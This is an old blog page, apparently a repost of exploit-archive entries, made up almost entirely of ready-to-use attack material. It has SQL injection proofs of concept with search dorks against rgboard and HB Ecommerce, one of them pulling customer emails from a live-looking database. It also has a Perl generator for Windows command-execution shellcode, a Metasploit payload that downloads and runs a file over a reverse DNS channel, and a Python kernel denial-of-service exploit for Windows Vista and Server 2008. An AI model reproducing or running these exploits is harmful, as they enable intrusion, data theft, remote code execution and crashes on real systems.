Post Your Wish

Wednesday, June 29, 2011

Rgboard SQL Injection Vulnerability

* Exploit Title: rgboard SQL Injection Vulnerability
 
* inurl: rgboard4/list.php
 
* Date: 2011. 6.22
 
* <script type="text/javascript">
/* <![CDATA[ */
(function(){try{var s,a,i,j,r,c,l=document.getElementById("__cf_email__");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
/* ]]> */
</script>)
 
* Test on : Windowss XP SP3
 
* Software Link: http://v4.rgboard.com/rg4_board/down.php?&bbs_code=rgboard_pds&bd_num=1757&key=0&mode=down
 
* Version: rgboard 4.2.1
 
* SQL Injection
     
    http://[target]/list.php?bbs_code=notice[SQL]
 
* POC : http://site/list.php?bbs_code=notice'+and+1=2+union+select+1%2C2%2C3%
2C4%2C1%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17
%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C
database()%2C(select%20concat(0x2f,unhex(Hex(cast(user()%20as%20char)))))
%2C30%2C31%2C32%2C33%2C34%2C35%2C6%2C5%2C4%2C3%2C2%23

Friday, May 27, 2011

win32/xp sp3 Command Execution exploit/shellcode - 44 Bytes + CMD


win32/xp sp3 Command Execution exploit/shellcode - 44 Bytes + CMD
#!/usr/bin/perl
system("cls");
sub logo(){
print q'
 Windows/32bit - Command Execution Exploit/ShellCode - 44 Bytes + CMD 
';
}
logo();
###
# Title : win32/xp sp3 Command Execution exploit/shellcode - 44 Bytes + CMD
# Author : Tringle2011
# platform : win32
# Impact : Command Execution / Shellcode maker
# Tested on : Windows XP sp3 
$ARGC=@ARGV;
if ($ARGC!=1) { 
   print "\n [!] Usage: perl $0 [Command] \n\n"; 
   die " [*] f.ex: perl $0 shutdown -s -t 18 \n"; 
}
my $CMD = shift;
my $header = q'
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int main(){
    
    unsigned char shellcode[]=
';
my $sh = q'
"\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x29\x53\xbb\xad\x23\x86\x7c".
"\xff\xd3\x31\xc0\x50\xbb\xfa\xca\x81\x7c\xff\xd3\xe8\xe0\xff\xff\xff".
"\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20'.$CMD.'"';
my $end = q'

    printf("Size = %d bytes\n", strlen(shellcode));
 
    ((void (*)())shellcode)();
 
    return 0;
}
';

print $header.$sh.$end;

Download and execute file via reverse DNS channel


Download and execute file via reverse DNS channel
##
# Shellcode: download and execute file via reverse DNS channel
#
#
# Features:
# * Windows 7 tested
# * UAC without work (svchost.exe makes requests via getaddrinfo)
# * Firewall/Router/Nat/Proxy bypass reverse connection (like dnscat do, but without sockets and stable!)
# * NO SOCKET
#
# DNS handler - http://dsecrg.com/files/pub/tools/revdns.zip\
# P.S. Works with  Vista/7/2008
#       do not work in XP/2003 because thre are no IPv6 by default.
#       can work in XP/2003 if IPv6 installed
#       (it is not need to be enabled, just installed)
 
require 'msf/core'
 
module Metasploit3
 
    include Msf::Payload::Windows
    include Msf::Payload::Single
 
    def initialize(info = {})
        super(update_info(info,
            'Name'          => 'DNS_DOWNLOAD_EXEC',
            'Version'       => '0.01',
            'Description'   => 'Download and Exec (via DNS)',
            'Author'        => [ 'Alexey Sintsov' ],
            'License'       => MSF_LICENSE,
            'Platform'      => 'win',
            'Arch'          => ARCH_X86,
            'Payload'       =>
                {
                    'Offsets' =>{ },
                     
                    'Begin' => "\xeb\x02\xeb\x7A\xe8\xf9\xff\xff\xff\x47\x65\x74\x50\x72\x6F\x63\x41\x64\x64\x72\x65\x73\x73\xFF\x47\x65\x74\x54\x65\x6d\x70\x50\x61\x74\x68\x41\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x57\x69\x6E\x45\x78\x65\x63\xFF\x45\x78\x69\x74\x54\x68\x72\x65\x61\x64\xff\x4C\x6F\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\xFF\x77\x73\x32\x5f\x33\x32\xFF\x57\x53\x41\x53\x74\x61\x72\x74\x75\x70\xFF\x67\x65\x74\x61\x64\x64\x72\x69\x6e\x66\x6f\xFF\x6d\x73\x76\x63\x72\x74\xFF\x66\x6f\x70\x65\x6e\xFF\x66\x77\x72\x69\x74\x65\xFF\xEB\x13\x66\x63\x6c\x6f\x73\x65\xFF",
                     
                    'Payload1' =>            "\xFF\x5e\x33\xc9\xb1\xe4\x8b\xd1\x2b\xe2\x8b\xfc\xf3\xa4\x33\xc0\x8b\xfc\x8A\x04\x39\x3A\xCA\x74\x0D\x3C\xFF\x74\x03\x41\xEB\xF2\x88\x2C\x39\x41\xEB\xEC\xeb\x78\x31\xC9\x64\x8B\x71\x30\x8B\x76\x0C\x8B\x76\x1C\x8B\x5e\x08\x8B\x7E\x20\x33\xed\x83\xc5\x18\x8B\x36\x66\x39\x0C\x2F\x75\xed\x8B\x73\x3C\x8B\x74\x1E\x78\x03\xF3\x8B\x7E\x20\x03\xFB\x8B\x4E\x14\x33\xED\x56\x57\x51\x8B\x3F\x03\xFB\x8B\xF2\x6A\x0E\x59\xF3\xA6\x74\x08\x59\x5F\x83\xC7\x04\x45\xE2\xE9\x59\x5F\x5E\x8B\xCD\x8B\x46\x24\x03\xC3\xD1\xE1\x03\xC1\x33\xC9\x66\x8B\x08\x8B\x46\x1C\x03\xC3\xC1\xE1\x02\x03\xC8\x8B\x01\x03\xC3\x8B\xFA\x8B\xF7\x83\xC6\x0E\x8B\xD0\x6A\x04\x59\xC3\x8b\xd4\xe8\x81\xff\xff\xff\x50\x33\xc0\xb0\x0f\x03\xf8\x57\x53\xff\xd2\x50\x33\xc0\xb0\x14\x03\xf8\x57\x53\xff\x54\x24\x0c\x50\x33\xc0\xb0\x08\x03\xf8\x57\x53\xff\x54\x24\x10\x50\x33\xc0\xb0\x0b\x03\xf8\x57\x53\xff\x54\x24\x14\x50\x8b\xc7\x83\xc0\x0d\x50\xff\x54\x24\x04\x8b\xd8\x33\xc0\xb0\x14\x03\xf8\x57\x53\xff\x54\x24\x18\x50\x33\xc0\xb0\x0b\x03\xf8\x57\x53\xff\x54\x24\x1C\x50\x83\xc7\x0c\x57\xff\x54\x24\x0c\x8b\xd8\x83\xc7\x07\x57\x53\xff\x54\x24\x20\x50\x83\xc7\x06\x57\x53\xff\x54\x24\x24\x50\x50\x8b\xf4\x83\xc7\x09\x57\x53\xff\x54\x24\x2c\x50\x33\xc0\xb4\x03\x2b\xe0\x8b\xcc\x51\x50\xff\x56\x20\x03\xe0\x59\x59\x8b\xc8\xb8",
                     
                    'Payload2' =>    "\xba\x01\x01\x01\x01\x2b\xc2\x50\xb8\x79\x78\x6f\x2e\x50\x2b\xe1\x8b\xcc\x33\xc0\xb0\x77\xb4\x62\x50\x54\x51\xff\x56\x08\x33\xd2\xb6\x03\xb2\x0c\x03\xe2\x50\x33\xc0\xb4\x05\x2b\xe0\x54\x33\xc0\xb0\x02\xb4\x02\x50\xff\x56\x10\x32\xc9\x50\x80\xf9\x80\x74\x04\xfe\xc1\xeb\xf6\x83\xc4\x10\xb0\x06\x50\xb0\x01\x50\xb0\x17\x50\x83\xec\x04\x8B\xEC\x83\xC7\x07\x83\xEC\x20\x33\xC0\x8A\x0C\x38\x88\x0C\x04\x40\x84\xC9\x75\xF5\x33\xc0\xb9\x61\x61\x61\x61\x8b\xd9\x51\x8b\xd4\x83\xc2\x7f\x52\x33\xd2\x55\x52\x8b\xd4\x83\xc2\x0c\x52\xff\x56\x0c\x59\x51\x85\xc0\x75\xe7\x33\xDB\xB3\xee\x2B\xE3\x50\x8b\xc5\x8b\x40\x5b\x8b\x48\x18\x8b\x50\x1c\x83\xC1\x08\x33\xC0\x33\xFF\x66\x8B\x01\x66\x3d\xff\xff\x74\x7f\x8b\xf8\xc1\xef\x08\x32\xe4\x5b\x03\xfb\x57\x66\x8B\x59\x02\x66\x89\x5c\x04\x04\x8B\x79\x04\x89\x7C\x04\x06\x8B\x79\x08\x89\x7C\x04\x0A\x8B\x79\x0C\x89\x7C\x04\x0E\x8b\xc2\x85\xc0\x75\xbb\x58\xff\x76\xf8\x50\xb0\x01\x50\x8b\xc4\x83\xc0\x0c\x50\xff\x56\x04\x33\xc0\xb0\xee\x03\xe0\x58\x58\x58\x58\x58\x2D\x61\x61\x61\x61\xC0\xE4\x04\x02\xC4\x3C\xFF\x75\x13\x8A\xE0\x40\xc1\xe8\x10\x3c\x1a\x75\x04\xfe\xc4\x32\xc0\xc1\xe0\x10\xeb\x08\x40\x8a\xe0\xC0\xEC\x04\x24\x0F\x05\x61\x61\x61\x61\x50\xe9\x46\xff\xff\xff\x8b\x46\xf8\x50\xff\x56\xfc\x66\xb8\x22\x05\x03\xe0"+"\x68\x2f\x63\x20\x22\x68\x63\x6d\x64\x20\x8b\xcc\x41\x8a\x01\x84\xc0\x75\xf9\xc6\x01\x22\x88\x41\x01"+"\x33\xc0\x8b\xcc\x50\x51\xff\x56\x1c\x50\xff\x56\x18" 
                     
                }
            ))
 
        # We use rtlExitThread(0)
        deregister_options('EXITFUNC')
 
        # Register the domain and cmd options
        register_options(
            [
                OptString.new('DOMAIN', [ true, "The domain name to use (9 bytes - maximum)" ]),
                OptString.new('FILE', [ true, "Filename extension (default VBS)" ]),
            ], self.class)
    end
 
    #
    # Constructs the payload
    #
    def generate_stage
        domain  = datastore['DOMAIN'] || ''
        extens  = datastore['FILE'] || 'vbs'
         
        # \"x66\x79\x66\x01"
        extLen=extens.length
         
        while extens.length<4
            extens=extens+"\x01"
        end
         
        i=0
        while i<extLen
            extens[i,1]=(extens[i].ord+1).chr
            i=i+1
        end
         
        while domain.length<10
            domain=domain+"\xFF"
        end
         
        domain="\x2e"+domain
         
        payload=module_info['Payload']['Begin'] + domain + module_info['Payload']['Payload1'] + extens + module_info['Payload']['Payload2']
                 
        return payload
    end
 
end

Microsoft Windows Vista/Server 2008 "nsiproxy.sys" Local Kernel DoS Exploit


Microsoft Windows Vista/Server 2008 "nsiproxy.sys" Local Kernel DoS Exploit
#!/usr/bin/python
 
############################################################################
##
## Title: Microsoft Windows Vista/Server 2008 "nsiproxy.sys" Local Kernel DoS Exploit
## Vendor: www.microsoft.com
## Vulnerable: Windows Vista/Server 2008
##
############################################################################
from ctypes import *
 
kernel32 = windll.kernel32
Psapi    = windll.Psapi
 
if __name__ == '__main__':
    GENERIC_READ  = 0x80000000
    GENERIC_WRITE = 0x40000000
    OPEN_EXISTING = 0x3
    CREATE_ALWAYS = 0x2
 
    SYM_NAME   = "\\\\.\\Nsi"
    dwReturn      = c_ulong()
    out_buff      = ''
    in_buff       = ("\x00\x00\x00\x00\x00\x00\x00\x00\xec\x2d\x39\x6e\x07\x00\x00\x00"
                     "\x01\x00\x00\x00\x00\x00\x00\x00\x38\x89\x6c\x01\x08\x00\x00\x00"
                     "\x00\x00\x00\x00\x00\x00\x00\x00\x10\xfa\x78\x00\x28\x00\x00\x00"
                     "\x38\xfa\x78\x00\x0c\x00\x00\x00")
 
    handle = kernel32.CreateFileA(SYM_NAME, GENERIC_READ | GENERIC_WRITE,0, None, CREATE_ALWAYS, 0, None)
    dev_ioct = kernel32.DeviceIoControl(handle, 0x12003f, in_buff,len(in_buff), out_buff, len(out_buff),byref(dwReturn), None)

HB ECOMMERCE SQL Injection Vulnerability


-------------[ HB ECOMMERCE SQL Injection Vulnerability ]---------------
------------------------------------------------------------------------
------------------------------------------------------------------------
[+] Exploit Title: [ HB ECOMMERCE SQL Injection Vulnerability ]
[+] Google Dork: intext:'supplied by hb ecommerce'
[+] Date: 26.05.2011
[+] Author: Tringle2011
[+] Software Link: http://www.hbecommerce.co.uk/
[+] Tested on: Debian GNU/Linux Testing(Wheezy) x64
[+] System: PHP
------------------------------------------------------------------------
------------------------------------------------------------------------
vulnerable url:
 
/templates1/view_product.php?product=3D
 
Example:
 
http://localhost/templates1/view_product.php?product=3D[SQL INJECTION]
 
Get an Mail from the Customers Table:
 
http://localhost/templates1/view_product.php?product=3D94746%20AND%20%28SEL=
ECT%20716%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%28CHAR%2858%2C122%2C99%=
2C109%2C58%29%2C%28SELECT%20MID%28%28IFNULL%28CAST%28email%20AS%20CHAR%29%2=
CCHAR%2832%29%29%29%2C1%2C50%29%20FROM%20%60web34-hbecommerc%60.customers%2=
0LIMIT%205%2C1%29%2CCHAR%2858%2C109%2C103%2C100%2C58%29%2CFLOOR%28RAND%280%=
29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%2=
9a%29%20
 
note: customer passwords dumped in plaintext!